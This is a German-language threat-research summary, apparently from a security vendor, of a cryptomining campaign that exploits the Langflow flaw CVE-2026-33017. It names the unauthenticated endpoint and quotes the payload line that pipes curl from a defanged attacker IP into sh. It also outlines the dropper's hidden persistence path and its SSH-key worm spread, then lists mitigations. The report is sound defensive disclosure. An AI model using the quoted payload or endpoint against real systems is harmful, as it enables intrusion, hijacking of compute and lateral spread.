Künstliche Intelligenz (KI)
Cryptomining mit neuem Verbreitungsweg
Wir haben eine Kampagne zu Kryptowährungs-Mining analysiert, bei der die Sicherheitslücke CVE-2026-33017 in Langflow ausgenutzt wurde. Sie zeigt, wie Angreifer mittlerweile exponierte KI-Anwendungsinfrastrukturen nach einem weiteren Einfallspunkt absuchen.
Wichtigste Erkenntnisse
- CVE-2026-33017 ermöglicht eine nicht authentifizierte Remote-Code-Ausführung (RCE). Die zugrunde liegende Toolkette für das Schürfen von Kryptowährungen ist zwar nicht neu, doch unsere Analyse zeigt eine Verlagerung des Verbreitungswegs, der nun auf ungeschützte Endpunkte von KI-Anwendungen abzielt.
- Die Malware deaktiviert Sicherheitskontrollen auf Host-Ebene, installiert einen maßgeschneiderten Miner und sorgt für Persistenz. Die Malware kann sich zudem über wiederverwendete SSH-Schlüssel auf andere Systeme ausbreiten und so eine exponierte Langflow-Instanz als Sprungbrett für weitere Kompromittierungen nutzen.
- Unternehmen, die Langflow einsetzen, sollten prüfen, ob Instanzen dem öffentlichen Internet ausgesetzt sind und ob die Anwendung unter einem privilegierten Konto oder auf einer Infrastruktur mit Zugriff auf andere Systeme läuft.
- Wenden Sie relevante Langflow-Sicherheitsupdates an, beschränken Sie den öffentlichen Zugriff auf Langflow-Instanzen und überprüfen Sie, ob der Dienst mit mehr Berechtigungen als erforderlich ausgeführt wird. Behandeln Sie alle Anzeichen einer Kompromittierung als potenziellen Vorfall.
Eine Kampagne zum Schürfen von Kryptowährungen nutzt die Schwachstelle CVE-2026-33017 in Langflow aus, einem Tool für die Entwicklung und Bereitstellung von AI-Agenten und MCP-Servern. Diese Kampagne zeigt, wie exponierte Endpunkte von KI-Anwendungen zu einem weiteren Einfallstor in Unternehmensumgebungen werden. Die Sicherheitslücke bietet Betreibern von handelsüblichen Kryptominer-Programmen eine neue Hintertür in Systeme, auf denen KI-Anwendungsinfrastruktur läuft. Die Payload mag bekannt sein, der Übertragungsweg jedoch ist neu.
Eine einzige Zeile Python-Code, die innerhalb eines nicht authentifizierten Langflow-API-Endpunkts ausgewertet wird, lädt ein Shell-Skript herunter, holt eine Miner-Binärdatei ab und startet diese im Hintergrund. Innerhalb weniger Minuten beendet die Binärdatei jeden konkurrierenden Kryptowährungs-Miner-Prozess, den sie identifizieren kann, deaktiviert jede von Linux angebotene Sicherheitskontrolle auf Host-Ebene, richtet cron-basierte Persistenz ein und beginnt, Signale an ihren C&C-Server zu senden – und das alles, noch bevor die SSH-Wurm-Phase im Dropper die Durchsuche des Schlüsselrings des Opfers abgeschlossen hat.
Das Neue daran ist diese „Vordertür“. Betreiber von handelsüblichen Kryptominern – dieselben Angreifer, die seit Jahren Schwachstellen in der Docker-API, in Confluence und bei SSH-Brute-Force-Angriffen ausnutzen – scannen nun massenhaft nicht authentifizierte Endpunkte von KI-Anwendungen. Langflow ist das aktuelle Ziel, doch das Muster lässt sich auf jedes KI-Pipeline-Tool verallgemeinern, das mit Standard-Anmeldedaten oder ohne Authentifizierung bereitgestellt wird. Die hinter dieser „Tür“ verborgenen Payloads existieren bereits seit mindestens Mai 2024, in einigen Fällen sogar mit demselben Dateinamen und Installationspfad. Lediglich der Übertragungsweg hat sich geändert.
Wir haben den Angriffsablauf in allen Schritten analysiert. Wir haben einen einzelnen Indikator für eine Kompromittierung (IoC), der über einen Zeitraum von 19 Tagen bei Langflow-Exploits über CVE-2026-33017 beobachtet wurde, nachverfolgt. Langflow ist nicht das erste KI-Anwendungs-Framework, das als Übertragungsvektor für Commodity-Miner dient, und es wird auch nicht das letzte sein. Was sich zwischen den Kampagnen ändert, ist selten die Payload, sondern die „Vordertür“.
Der erste Zugriff erfolgt durch Ausnutzung von CVE-2026-33017, einer Sicherheitslücke im Zusammenhang mit einem nicht authentifizierten POST-Aufruf an den Langflow-Endpunkt (/api/v1/build_public_tmp/{flow_id}/flow), über den ein vom Angreifer bereitgestelltes Python-Skript den Befehl __import__(‚os‘).system('curl hxxp[://] 83[.]142[.]209[.]214:8080/isp.sh | sh‘) ausführt. Diese eine Zeile löst den Rest der Angriffskette aus. Der Angreifer verwendet bei jedem Exploit-Versuch dieselbe fest codierte „flow_id“.
Der Dropper „isp.sh“ ist ein kurzes Bash-Skript, dessen Aufgabe es ist, zu prüfen, ob eine Binärdatei namens „lambsys“ bereits ausgeführt wird. Es erstellt ein verstecktes Persistenzverzeichnis unter /var/tmp/.xlamb/, lädt diese Binärdatei über curl oder wget herunter, startet sie im Hintergrund und verbreitet sich anschließend auf jeden SSH-erreichbaren Host, bei dem sich das Opfer authentifizieren kann, indem es Schlüsseldateien und Agent-Sockets auflistet. Die Deaktivierung von Sicherheitskontrollen, das Beenden konkurrierender Miner und die Persistenz finden alle innerhalb von „lambsys“ selbst statt, nicht im Dropper.
Alle Einzelheiten zu den vier Phasen des Angriffs liefert der Originalbeitrag.
Gegenmaßnahmen
Organisationen, die Langflow nutzen, sollten auf Version 1.9.0 oder höher aktualisieren, den öffentlichen Zugriff auf Langflow-Instanzen einschränken und prüfen, ob der Dienst mit mehr Berechtigungen als erforderlich ausgeführt wird.
Erwägen Sie die Implementierung einer Abhilfemaßnahme, die während der Entwicklung in Version 1.9.0.dev8 eingeführt wurde und verhindert, dass öffentliche Flows von Angreifern kontrollierte Daten akzeptieren, sowie das Protokollieren von Versuchen, benutzerdefinierte Daten zu übermitteln.
Sicherheitsverantwortliche sollten zudem die Protokolle auf Anzeichen von Exploit-Versuchen überprüfen, jede Kompromittierung als potenzielle Sicherheitslücke behandeln, exponierte SSH-Schlüssel rotieren und verbundene Systeme auf damit verbundene Aktivitäten überprüfen.
TrendAI™ Research verfolgt diese Bedrohung und die damit verbundenen Kampagnen auch weiterhin und liefert dazu das nötige Wissen für Unternehmen, um den Bedrohungen einen Schritt voraus sein zu können.
Im Original finden Sie auch eine Tabelle mit MITRE ATT&CK Mapping, die in der Kampagne genutzt wurden, sowie die IoCs dazu.